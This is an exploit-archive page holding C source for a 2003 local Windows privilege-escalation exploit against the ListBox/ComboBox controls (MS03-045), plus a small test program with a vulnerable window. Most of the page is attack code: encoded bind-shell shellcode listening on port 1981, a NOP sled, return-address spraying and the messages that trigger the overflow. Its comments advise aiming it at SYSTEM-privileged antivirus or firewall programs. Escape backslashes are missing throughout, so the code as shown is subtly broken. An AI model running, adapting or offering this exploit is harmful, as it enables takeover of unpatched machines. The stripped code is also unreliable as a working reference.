[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MS Windows (ListBox/ComboBox Control) Local Exploit (MS03-045)
# Published : 2003-11-14
# Author : xCrZx
# Previous Title : OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit
# Next Title : Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC)


/*
	local ListBox/ComboBox exploit for Win32 
/	
	Created by xCrZx crazy_einstein yahoo com /11.11.03/
/
	Usage: MS03-045.exe <-t target> [-r return address]
/
	there is two targets: CB_DIR (for ComboBox), LB_DIR (for ListBox).
/
	As to return address it should be such as 0x0000XXYY
/	(and you should know that this address will be transformed
	into unicode! And if XX and YY bytes <128 it will maintained!
/	And return address will be such as 0x00XX00YY!
	If not it will be coded in two bytes each of this bytes and
/	return will be looked like 0xZZZZWWWW)

/	To figure out handle addresses you can use tools such as
	Spy++ (default tool contained in MSVC++ 6.0)
/
	Note: 	there is no so easy exploitation of this stuff!
/		first of all you should figure out the handle
		addresses of ListBox/ComboBox & EDIT,RichEdit,etc
/		(to store shellcode inside of it.. you can also
		store shellcode by diffrent way into variables of
/		vuln program (i.e. through fopen(),argv,etc..)

/	
	yesh yesh y0...check it out y0...
/	wu-tang clan forever :)

/	greetzz to: tANDm :), Billi_k1d, alph4, btr, hhs, v1pee, ni69az,
		    akid, Joel Eriksson, andrewg, Amour and others...
/
       tested on WinXP (also should work on others Win32)
/
	p.s. use can find vuln program with SYSTEM privileges (antivirus,firewall,etc)
/            to obtain the SYSTEM privileges

*/

/*

/	example of work:
	-----------------
/
	vuln program:
/
	C:...ual StudioMyProjectsvulnDebug>vuln.exe
/

/	C:...ual StudioMyProjectsvulnDebug>

/
	-------
/
	exploit:
/
	C:MSVCSTAFFDebug>85boom.exe -t 0
/
	[MS03-045 local exploit by xCrZx /11.11.03/]
/
	Enter addresses of the program handles:
/	<handle of Edit/RichEdit/etc (to store shellcode)> <handle of ListBox/ComboBox>
	(i.e. "00450ca1 0066345c") -> 1e01f6 2701a2
/
	[+] Set shellcode!
/	--> Using LB_DIR command
	--> Using return address = 0x1515
/	[+] Set return addresses!
	[+] Sending shellcode message!
/	[+] Sending exploit message! Try to connect on 1981 port after 5 sec!

/
	--------
/
	Microsoft Telnet> open localhost 1981
/
	...
/
	Microsoft Windows XP [?¥àá¨? 5.1.2600]
/	(‘) ??àˉ?à ?¨? ? ?aà?á??a, 1985-2001.

/	C:Program FilesMicrosoft Visual StudioMyProjectsvulnDebug>

*/


#include <windows.h>
#include <stdio.h>
#include <tchar.h>


char shellcode[] =

//bind on 1981
"xEBx0Fx5Bx80x33x93x43x81x3Bx45x59x34x53x75xF4x74"
"x05xE8xECxFFxFFxFF"
//sc_bind_1981 for 2k/xp/2003 by ey4s
//speacial version for ws_ftp base on v1.03.10.07
//XOR with 0x93 (367 0x16F bytes)
"x12x7Fx93x91x93x93x7AxA4x92x93x93xCCxF7x32xA3x93"
"x93x93x18xD3x9Fx18xE3x8Fx3Ex18xFBx9BxF9x97xCAx7B"
"x4Ax93x93x93x71x6AxFBxA0xA1x93x93xFBxE4xE0xA1xCC"
"xC7x6CxC4x6Fx18x7BxF9x95xCAx7Bx2Cx93x93x93x71x6A"
"x12x7Fx03x92x93x93xC7xFBx91x91x93x93x6CxC4x7BxC3"
"xC3xC3xC3xF9x92xF9x91x6CxC4x63x18x4Bx18x7Fx54xD6"
"x93x91x93x94x2ExA0x53x1AxD6x97xF9x83xC6xC0x6CxC4"
"x67xC0xF9x92xC0x6CxC4x6BxC3xC3xC0x6CxC4x6FxC3x10"
"x7FxCBx18x67xA0x48xF9x83xCAx1Ax8Fx1Dx71x68x78xBF"
"xD3xD3xD3xD3xD3xD3xD3xD3xD3xD3xD3xD3xD3xD3xD3xD3"
"xD3xD3xD3xD3x03x03x03x03xD3xD3xD3xD3xD3xD3xD3xD3"
"xE9x35xFFxFFxFFxD3xD3xD3xD3xD3xD3xD3x1AxD5xABx1A"
"xD5xAFx1AxD5xD3x54xD5xBFx92x92x93x93x1ExD5xD7xC3"
"xC5xC0xC0xC0xF9x92xC0xC0x1ExD5xC7x54x93xF0xFExF7"
"x93xC3xC0x6CxC4x73xA0x53xDBxC3x6CxE5xD7x6CxC4x4F"
"x10x57xCBx6CxC4x7Fx6CxC4x7FxC3x6CxC4x4BxC2x18xE6"
"xAFx18xE7xBDxEBx90x66xC5x18xE5xB3x90x66xA0x5AxDA"
"xD2x3Ex90x56xA0x48xA0x41x9Cx2Dx83xA9x45xE7x9Bx52"
"x58x88x90x49xD3x78x7CxA8x8CxE6x76xCDx18xCDxB7x90"
"x4ExF5x18x9FxD8x18xCDx8Fx90x4Ex18x97x18x90x56x38"
"xCAx50x7Bx57x6Dx6Cx6Cx7Ax28x50x3Dx27xEEx86x0Bx58"
"xD1xE4x2Bx4Fx4Ex89xA0xBEx87xC5x3Dx55xB8x2ExBDx4D"
"xC4xE1x37xB7x21xA1x93x9DxCEx58x4DxE7xB1xF0x5B"
//decode end sign
"x45x59x34x53";


#define SIZE 60000

int main(int argc, char **argv) {

	HWND target=(HWND)0x240302;
	HWND target2;
	char buf[SIZE+5];
	char b0000[30000];
	long ret=0x00001515;
	int trigger=0;

	printf("n[MS03-045 local exploit by xCrZx /11.11.03/]nn");

	if(argc==1) {	
			printf( "Usage: %s <-t N> [-r return address]nn"		
			"N targets (-t option):nnt0 - LB_DIRnt1 - CB_DIRnn"
			,argv[0]);
			exit(0); 
			}

	for(int j=0;j<argc;j++) {
		if(strcmp(argv[j],"-t")==NULL) { trigger = atoi(argv[j+1]); }
		if(strcmp(argv[j],"-r")==NULL) { ret = strtoul(argv[j+1],0,16); }
	}

printf("Enter addresses of the program handles:n<handle of Edit/RichEdit/etc (to store shellcode)> 
<handle of ListBox/ComboBox>n(i.e. "00450ca1 0066345c") -> ");fflush(stdout);
	scanf("%x %x",&target2,&target);


	memset(buf,0x00,sizeof buf);
	memset(b0000,0x00,sizeof b0000);

	printf("n[+] Set shellcode!n");

	memset(b0000,0x90,sizeof(b0000)-strlen(shellcode)-1);
	memcpy(b0000+strlen(b0000),&shellcode,strlen(shellcode));

	printf("--> Using %s commandn",(trigger)?("CB_DIR"):("LB_DIR"));
	printf("--> Using return address = 0x%xn",ret);
	printf("[+] Set return addresses!n");

	for(int i=0;i<SIZE/4;i++)
		*(long *)&buf[strlen(buf)]=ret;
		
	printf("[+] Sending shellcode message!n"); 

	SendMessage(target2,WM_SETTEXT,0,(LPARAM)b0000);

	printf("[+] Sending exploit message! Try to connect on 1981 port after 5 sec!n"); 

	SendMessage(target , (trigger)?(CB_DIR):(LB_DIR) , 
			DDL_READWRITE | DDL_DIRECTORY | DDL_DRIVES ,
			(LPARAM)buf
	);




	return 0;
}

------------------------------------------------------------------------------------------------------------
// zzz.cpp : Defines the entry point for the application.
//

#include "stdafx.h"
#include <windows.h>


LRESULT CALLBACK WndProc(HWND hwnd , UINT msg , WPARAM wp , LPARAM lp) {
	static HWND list;
	static HWND rich;

	switch (msg) {
	case WM_DESTROY:
		PostQuitMessage(0);
		return 0;
	case WM_CREATE:
		list = CreateWindow(
			TEXT("LISTBOX") , NULL , 
			WS_CHILD | WS_VISIBLE | LBS_STANDARD , 
			0 , 0 , 300 , 300 , hwnd , (HMENU)1 ,
			((LPCREATESTRUCT)(lp))->hInstance , NULL
		);
		rich = CreateWindow("EDIT",      // predefined class 
                                    NULL,        // no window title 
                                    WS_CHILD | WS_VISIBLE | WS_VSCROLL | 
                                    ES_LEFT | ES_MULTILINE | ES_AUTOVSCROLL, 
                                    300, 300, 100, 100,  // set size in WM_SIZE message 
                                    hwnd,        // parent window 
                                    (HMENU) 1,   // edit control ID 
                                    (HINSTANCE) GetWindowLong(hwnd, GWL_HINSTANCE), 
                                    NULL);  
		return 0;
	}
	return DefWindowProc(hwnd , msg , wp , lp);
}

int WINAPI WinMain(HINSTANCE hInstance , HINSTANCE hPrevInstance ,
			PSTR lpCmdLine , int nCmdShow ) {
	HWND hwnd;
	MSG msg;
	WNDCLASS winc;


	winc.style		= CS_HREDRAW | CS_VREDRAW;
	winc.lpfnWndProc	= WndProc;
	winc.cbClsExtra	= winc.cbWndExtra	= 0;
	winc.hInstance		= hInstance;
	winc.hIcon		= LoadIcon(NULL , IDI_APPLICATION);
	winc.hCursor		= LoadCursor(NULL , IDC_ARROW);
	winc.hbrBackground	= (HBRUSH)GetStockObject(WHITE_BRUSH);
	winc.lpszMenuName	= NULL;
	winc.lpszClassName	= TEXT("KITTY");

	if (!RegisterClass(&winc)) return -1;

	hwnd = CreateWindow(
			TEXT("KITTY") , TEXT("Kitty on your lap") ,
			WS_OVERLAPPEDWINDOW | WS_VISIBLE ,
			CW_USEDEFAULT , CW_USEDEFAULT ,
			CW_USEDEFAULT , CW_USEDEFAULT ,
			NULL , NULL , hInstance , NULL
	);

	if (hwnd == NULL) return -1;

	while(GetMessage(&msg , NULL , 0 , 0)) {
		TranslateMessage(&msg);
		DispatchMessage(&msg);
	}
	return msg.wParam;
}

// www.Syue.com [2003-11-14]